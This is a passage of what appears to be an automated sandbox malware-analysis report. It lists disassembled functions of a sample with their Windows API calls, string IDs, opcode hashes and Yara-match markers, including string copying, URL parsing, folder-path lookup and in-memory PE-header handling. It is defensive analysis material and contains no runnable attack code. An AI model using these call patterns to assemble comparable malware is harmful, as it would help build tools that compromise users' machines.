                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C71802
                                                        • Part of subcall function 02C71797: lstrcpy.KERNEL32(00000000,?), ref: 02C71866
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C837D9
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C83802
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C83828
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8384E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID:
                                                      • API String ID: 3722407311-0
                                                      • Opcode ID: 1e9be69b6d1d964f5a35dcc0e79b14959f9aa6a02d672a7784e4edeb24e27305
                                                      • Instruction ID: 41cb037f95b2edbe6cd3e9250b5b3da7747a72b64a1115b63ee4d94495a1cf57
                                                      • Opcode Fuzzy Hash: 1e9be69b6d1d964f5a35dcc0e79b14959f9aa6a02d672a7784e4edeb24e27305
                                                      • Instruction Fuzzy Hash: 3512EB70A012418FDB18DF19C558B25B7E5AF84B2CB19D1EED809DB3A1D772D982CF90
                                                      Function 00408780 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 004087DC
                                                      • memcpy.MSVCRT(?,?,00000000,00000000,00407897), ref: 00408822
                                                        • Part of subcall function 00408980: std::_Xinvalid_argument.LIBCPMT ref: 00408996
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Xinvalid_argumentstd::_$memcpy
                                                      • String ID: string too long
                                                      • API String ID: 2304785028-2556327735
                                                      • Opcode ID: 1ec711253458015476fa0fdf246fcdf1831fe10d1430631244de81fbdc863098
                                                      • Instruction ID: e75b845ac4a54d531e9520b8b17775a39ee458b7094510186484d20565971360
                                                      • Opcode Fuzzy Hash: 1ec711253458015476fa0fdf246fcdf1831fe10d1430631244de81fbdc863098
                                                      • Instruction Fuzzy Hash: 0721AE213106508BDB259A6C8E80A2AB3E6AB85701B74093FE4D1D77C6DF79AC40879D
                                                      Function 02C78AB7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 02C78AEA
                                                        • Part of subcall function 02C9A5EA: std::exception::exception.LIBCMT ref: 02C9A5FF
                                                        • Part of subcall function 02C9A5EA: __CxxThrowException@8.LIBCMT ref: 02C9A614
                                                        • Part of subcall function 02C9A5EA: std::exception::exception.LIBCMT ref: 02C9A625
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                      • String ID: yxxx$yxxx
                                                      • API String ID: 1823113695-1021751087
                                                      • Opcode ID: b6d375bd9d7859bbd86cd9656df10d63bac0162cd2838bb1dbda21e5c2292a03
                                                      • Instruction ID: 5d4fb20d87b8f837ec777535247128b6b3375afce8b45757936e6c1695536bf4
                                                      • Opcode Fuzzy Hash: b6d375bd9d7859bbd86cd9656df10d63bac0162cd2838bb1dbda21e5c2292a03
                                                      • Instruction Fuzzy Hash: C23187B5E005199BCB08DF58C8906AEBBB6EBD8310F18C269E915EF384D734A901CBD1
                                                      Function 00408A60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00408A75
                                                        • Part of subcall function 0042A383: std::exception::exception.LIBCMT ref: 0042A398
                                                        • Part of subcall function 0042A383: __CxxThrowException@8.LIBCMT ref: 0042A3AD
                                                      • memcpy.MSVCRT(?,?,?), ref: 00408ABF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8ThrowXinvalid_argumentmemcpystd::_std::exception::exception
                                                      • String ID: string too long
                                                      • API String ID: 2475949303-2556327735
                                                      • Opcode ID: 1ea38f53a1986befa71b2f14c9c86753e2a733b722ecbf4c63771af5796a1cdd
                                                      • Instruction ID: 7161fd42a55e92d43a5e45998473509cc6e3c5444d18c1b7783adeed0e280c87
                                                      • Opcode Fuzzy Hash: 1ea38f53a1986befa71b2f14c9c86753e2a733b722ecbf4c63771af5796a1cdd
                                                      • Instruction Fuzzy Hash: A821D3317046045BEB20CE6DDA4066EB7A6EBD5320F148A3FE891937C1DF74A9448A98
                                                      Function 00408B80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00408B8F
                                                        • Part of subcall function 0042A3D0: std::exception::exception.LIBCMT ref: 0042A3E5
                                                        • Part of subcall function 0042A3D0: __CxxThrowException@8.LIBCMT ref: 0042A3FA
                                                      • memmove.MSVCRT(?,?,?,?,?,004089B2,00000000,?,?,004087D0,?,00000000,00407897), ref: 00408BC5
                                                      Strings
                                                      • invalid string position, xrefs: 00408B8A
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8ThrowXinvalid_argumentmemmovestd::_std::exception::exception
                                                      • String ID: invalid string position
                                                      • API String ID: 655285616-1799206989
                                                      • Opcode ID: f028ea1e87d6ef5ac08bc30147daee1a1170208e71a992f96d283b447fa1bbce
                                                      • Instruction ID: 251e689e54e62f48c7bad3d43e38cf1f7295a935bb062c6d590f7bc18ba98dac
                                                      • Opcode Fuzzy Hash: f028ea1e87d6ef5ac08bc30147daee1a1170208e71a992f96d283b447fa1bbce
                                                      • Instruction Fuzzy Hash: 3D0184703047018BD7258A2CEE9461AB7B6DBC5704B68093EE0D2D7B85DBB8FC42839C
                                                      Function 02C74E27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50stringnetworkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlen.KERNEL32(?,00000000,?), ref: 02C74E86
                                                      • InternetCrackUrlA.WININET(?,00000000), ref: 02C74E8E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CrackInternetlstrlen
                                                      • String ID: <
                                                      • API String ID: 1274457161-4251816714
                                                      • Opcode ID: 83350d63855a898580c196c4f361b3f244a8d67ec79f2e5ffb9c4633858592fb
                                                      • Instruction ID: 5b500854a877a1c397caa8f8373435d6f5f1224f8ad42c348f90db06245638c7
                                                      • Opcode Fuzzy Hash: 83350d63855a898580c196c4f361b3f244a8d67ec79f2e5ffb9c4633858592fb
                                                      • Instruction Fuzzy Hash: C7012971D00218AFEB14DFA9EC45B9EBBB9EB48360F00812AF954E7390EB7459058FD0
                                                      Function 02C71327 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitGlobalMemoryProcessStatus
                                                      • String ID: @
                                                      • API String ID: 803317263-2766056989
                                                      • Opcode ID: f127fba7727a91b88187df4bdea323de0718f2841fffded282c9bdb05d23b48c
                                                      • Instruction ID: 0104c7d3b133c38f143275394d13649da6cf77ff646445b5046ddd7f811f225e
                                                      • Opcode Fuzzy Hash: f127fba7727a91b88187df4bdea323de0718f2841fffded282c9bdb05d23b48c
                                                      • Instruction Fuzzy Hash: 76F027701082848BEF146675C88972DF3D8DB42354F080A2DDD9EC2A90E3F0C400C67B
                                                      Function 00427679 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • std::exception::operator=.LIBCMT ref: 00427692
                                                        • Part of subcall function 00427612: std::exception::_Tidy.LIBCMT ref: 00427622
                                                        • Part of subcall function 00427612: std::exception::_Copy_str.LIBCMT ref: 00427632
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::exception::_$Copy_strTidystd::exception::operator=
                                                      • String ID: PVC$RvB
                                                      • API String ID: 2698302428-3672294337
                                                      • Opcode ID: 3bcccb99a86f891201583defc26f550b7ded3d8e37b933871c58baabc1632d31
                                                      • Instruction ID: bb51f0ba413812d8853d7eb6890f665a9bd2e51ac6c0f51ff85d0c39d38b05c4
                                                      • Opcode Fuzzy Hash: 3bcccb99a86f891201583defc26f550b7ded3d8e37b933871c58baabc1632d31
                                                      • Instruction Fuzzy Hash: 60D0A9322043246BC3201A8AE809B83FF88DB413B6F40882EE5C847300CBB9985087E8
                                                      Function 02C8C4AF Relevance: 5.1, APIs: 4, Instructions: 86stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 02C944B7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 02C944E4
                                                        • Part of subcall function 02C944B7: lstrcpy.KERNEL32(00000000,?), ref: 02C94519
                                                        • Part of subcall function 02C97737: lstrcpy.KERNEL32(00000000), ref: 02C97766
                                                        • Part of subcall function 02C97737: lstrcat.KERNEL32(00000000), ref: 02C97772
                                                        • Part of subcall function 02C97787: lstrlen.KERNEL32(------,02C75E52), ref: 02C97792
                                                        • Part of subcall function 02C97787: lstrcpy.KERNEL32(00000000), ref: 02C977B6
                                                        • Part of subcall function 02C97787: lstrcat.KERNEL32(?,------), ref: 02C977C0
                                                        • Part of subcall function 02C976F7: lstrcpy.KERNEL32(00000000), ref: 02C97725
                                                        • Part of subcall function 02C942A7: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C942DC
                                                        • Part of subcall function 02C942A7: lstrcpy.KERNEL32(00000000,00638AA4), ref: 02C94306
                                                        • Part of subcall function 02C942A7: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02C715B5,?,0000001A), ref: 02C94310
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8C6A2
                                                      • lstrcat.KERNEL32(00000000), ref: 02C8C6AC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8C6DA
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C8C719
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
                                                      • String ID:
                                                      • API String ID: 2910713533-0
                                                      • Opcode ID: 24b5cf9d3328fae0c45e8d89246218dd751768110a068050fd15e1e67777ade2
                                                      • Instruction ID: d2aab05d0f96b64370cfc34a65d87c8a7f94f5ddf16d3b273a0bd73f32c734cf
                                                      • Opcode Fuzzy Hash: 24b5cf9d3328fae0c45e8d89246218dd751768110a068050fd15e1e67777ade2
                                                      • Instruction Fuzzy Hash: 5C318B70D0025ADBDF14EFA4CC88B9DB7B6AF94308F1480A6D805A7250DB749F85EFA1
                                                      Function 02C8C614 Relevance: 5.1, APIs: 4, Instructions: 85stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 02C944B7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 02C944E4
                                                        • Part of subcall function 02C944B7: lstrcpy.KERNEL32(00000000,?), ref: 02C94519
                                                        • Part of subcall function 02C97737: lstrcpy.KERNEL32(00000000), ref: 02C97766
                                                        • Part of subcall function 02C97737: lstrcat.KERNEL32(00000000), ref: 02C97772
                                                        • Part of subcall function 02C97787: lstrlen.KERNEL32(------,02C75E52), ref: 02C97792
                                                        • Part of subcall function 02C97787: lstrcpy.KERNEL32(00000000), ref: 02C977B6
                                                        • Part of subcall function 02C97787: lstrcat.KERNEL32(?,------), ref: 02C977C0
                                                        • Part of subcall function 02C976F7: lstrcpy.KERNEL32(00000000), ref: 02C97725
                                                        • Part of subcall function 02C942A7: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C942DC
                                                        • Part of subcall function 02C942A7: lstrcpy.KERNEL32(00000000,00638AA4), ref: 02C94306
                                                        • Part of subcall function 02C942A7: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02C715B5,?,0000001A), ref: 02C94310
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8C6A2
                                                      • lstrcat.KERNEL32(00000000), ref: 02C8C6AC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8C6DA
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C8C719
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$FolderPathSystemTimelstrlen
                                                      • String ID:
                                                      • API String ID: 2910713533-0
                                                      • Opcode ID: 6f5709e280dc5b66a845d9763e97af322c35ce3dbc48c25b30e692c72c51b1bb
                                                      • Instruction ID: 91f018f9deca8a1c05282628f5f5d5bf497a9411f2747f15ddf0f7a58f498b54
                                                      • Opcode Fuzzy Hash: 6f5709e280dc5b66a845d9763e97af322c35ce3dbc48c25b30e692c72c51b1bb
                                                      • Instruction Fuzzy Hash: 49317C71E002499BDF14EFA4CC88B9DB7B2EF80308F1580A6D805AB250DB749F45EFA1
                                                      Function 00421740 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000), ref: 00421771
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 004217A9
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 004217E1
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00421819
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID:
                                                      • API String ID: 3722407311-0
                                                      • Opcode ID: 7e39542eb815251b26265a8778df00e4c3cd8d6bba4f32d2fc9bec7db7d7b59b
                                                      • Instruction ID: c18d6414a2412b528fc955e16ea083020aa3798d7b09f0809961d6aed774200b
                                                      • Opcode Fuzzy Hash: 7e39542eb815251b26265a8778df00e4c3cd8d6bba4f32d2fc9bec7db7d7b59b
                                                      • Instruction Fuzzy Hash: 63212A74701B028BD724DF3AE998A17B7F5AF94700B40492EE486D3B90DB78E801CFA4
                                                      Function 00401530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00401610: lstrcpy.KERNEL32(00000000), ref: 0040162D
                                                        • Part of subcall function 00401610: lstrcpy.KERNEL32(00000000,?), ref: 0040164F
                                                        • Part of subcall function 00401610: lstrcpy.KERNEL32(00000000,?), ref: 00401671
                                                        • Part of subcall function 00401610: lstrcpy.KERNEL32(00000000,00420703), ref: 00401693
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00401557
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00401579
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0040159B
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 004015FF
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID:
                                                      • API String ID: 3722407311-0
                                                      • Opcode ID: f6290d38e266f0673cc93ec969457b120af7ef1e1bcd1c1e7eedd9cdd132e45b
                                                      • Instruction ID: 80b5f1fa651da611af66416e481b020f72ab7f98df4cd08dbf14573642dabe07
                                                      • Opcode Fuzzy Hash: f6290d38e266f0673cc93ec969457b120af7ef1e1bcd1c1e7eedd9cdd132e45b
                                                      • Instruction Fuzzy Hash: 7931C674A01B02AFC724DF3AC988953B7E5BF48304704492EA896D7BA0DB74F811CF94
                                                      Function 02C71797 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 02C71877: lstrcpy.KERNEL32(00000000), ref: 02C71894
                                                        • Part of subcall function 02C71877: lstrcpy.KERNEL32(00000000,?), ref: 02C718B6
                                                        • Part of subcall function 02C71877: lstrcpy.KERNEL32(00000000,?), ref: 02C718D8
                                                        • Part of subcall function 02C71877: lstrcpy.KERNEL32(00000000,?), ref: 02C718FA
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C717BE
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C717E0
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C71802
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C71866
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID:
                                                      • API String ID: 3722407311-0
                                                      • Opcode ID: 1afde8574ea894d459d100918e21e6a29778509595042a849cc3986aceadaf2e
                                                      • Instruction ID: 205a64e1747e96bf0d1d08f3409b6b9585c35ec395b86f1516d2fdb9ffb83503
                                                      • Opcode Fuzzy Hash: 1afde8574ea894d459d100918e21e6a29778509595042a849cc3986aceadaf2e
                                                      • Instruction Fuzzy Hash: 4D3192B4A01B42AFD728DF3AD588956BBE9FF89709704492DA896C3B50DB70F410DF90
                                                      Function 02C8C48D Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 02C97787: lstrlen.KERNEL32(------,02C75E52), ref: 02C97792
                                                        • Part of subcall function 02C97787: lstrcpy.KERNEL32(00000000), ref: 02C977B6
                                                        • Part of subcall function 02C97787: lstrcat.KERNEL32(?,------), ref: 02C977C0
                                                        • Part of subcall function 02C976F7: lstrcpy.KERNEL32(00000000), ref: 02C97725
                                                        • Part of subcall function 02C942A7: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C942DC
                                                        • Part of subcall function 02C942A7: lstrcpy.KERNEL32(00000000,00638AA4), ref: 02C94306
                                                        • Part of subcall function 02C942A7: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02C715B5,?,0000001A), ref: 02C94310
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8C6A2
                                                      • lstrcat.KERNEL32(00000000), ref: 02C8C6AC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C8C6DA
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C8C719
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcat$SystemTimelstrlen
                                                      • String ID:
                                                      • API String ID: 3486790982-0
                                                      • Opcode ID: 391cc230fe22c833b7d73818f8b18e323177aab1a4d2678ce48e4e0ca96b9384
                                                      • Instruction ID: b99be0b285b9220dd10db421a37ee33f7f966b71e3e0cf9a6b6178441c8fedd2
                                                      • Opcode Fuzzy Hash: 391cc230fe22c833b7d73818f8b18e323177aab1a4d2678ce48e4e0ca96b9384
                                                      • Instruction Fuzzy Hash: 63217C70D00246DBCB14EFB4CC88AAD7BB6EF84308F149466D401AB250DB749B44EFA1
                                                      Function 00406EF2 Relevance: 5.1, APIs: 4, Instructions: 69memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • memcpy.MSVCRT(?,?,00000040), ref: 00406F00
                                                      • memcpy.MSVCRT(?,00005A4D,000000F8), ref: 00406F3C
                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 00406F74
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00406F7B
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heapmemcpy$AllocProcess
                                                      • String ID:
                                                      • API String ID: 1643994569-0
                                                      • Opcode ID: 0f7b886846e76426d6cbee1e2efefd49dca9b7f6cc258be776eaadaa1a2d8544
                                                      • Instruction ID: 3489786ad6ffc592b33c98b5093e94c05e4d8cefe55189094fd4c73ee0e5810c
                                                      • Opcode Fuzzy Hash: 0f7b886846e76426d6cbee1e2efefd49dca9b7f6cc258be776eaadaa1a2d8544
                                                      • Instruction Fuzzy Hash: 8B216D706106029BDB248B21DD84BBB73E8EB40704F44487DF946DBA84FBB9E956CB64
                                                      Function 00401610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000), ref: 0040162D
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0040164F
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00401671
                                                      • lstrcpy.KERNEL32(00000000,00420703), ref: 00401693
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID:
                                                      • API String ID: 3722407311-0
                                                      • Opcode ID: 28fd2b5c74b08a858c26432764930a6c7ed5af5e3d7337ed90fdeaffeb5ceb02
                                                      • Instruction ID: 77a9aadbbd26ea48150a62d0fa0b2c9b2127a70dadc2ffa25d6a6684b0360a2a
                                                      • Opcode Fuzzy Hash: 28fd2b5c74b08a858c26432764930a6c7ed5af5e3d7337ed90fdeaffeb5ceb02
                                                      • Instruction Fuzzy Hash: 291112B46117029BD7149F36D94C927B7F8BF44305704093EA496E3B90DB79E801CB94
                                                      Function 02C71877 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000), ref: 02C71894
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C718B6
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C718D8
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C718FA
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
